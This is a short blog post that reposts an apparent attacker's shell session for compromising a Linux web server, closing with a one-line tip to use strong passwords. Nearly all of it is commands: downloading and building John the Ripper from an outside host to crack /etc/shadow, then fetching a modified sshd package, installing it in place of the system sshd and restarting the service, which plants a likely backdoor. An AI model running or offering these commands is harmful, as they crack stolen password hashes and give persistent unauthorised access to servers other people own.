How Hackers Hack Web Servers!

Here’s a rather interesting forum post that details how hackers hack web servers:

w

wget geocities.com/cretu_2004/john-1.6.tar.gz;tar zxvf

john-1.6.tar.gz;rm -rf john-1.6.tar.gz;cd john-1.6/src;make linux-x86-any-elf;cd

../run;./john /etc/shadow

wget www.geocities.com/securedro/sshd.tar.gz;tar -xzf sshd.tar.gz;rm

-rf sshd.tar.gz;cd sshd;cd apps/ssh

pico genx.h

pico genx.h

pico ssh2includes.h

cd ../..

./configure –without-x

make

make install

mkdir /lib/java

cp /usr/sbin/sshd a

mv a /lib/java

rm -rf /usr/sbin/sshd

cp /usr/local/sbin/sshd /usr/sbin

/etc/rc.d/init.d/sshd restart

/etc/rc.d/init.d/ssh restart

locate init.d

/etc/init.d/sshd restart

w

reboot

Of course, the hackers would have to hack your username and password first. Well, use strong passwords!

Share

Recommended Web Server Hacks



This entry was posted in Web Server Hacks and tagged , , . Bookmark the permalink.

Leave a Reply

Your email address will not be published. Required fields are marked *

*

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>

Related News and Resources

    None Found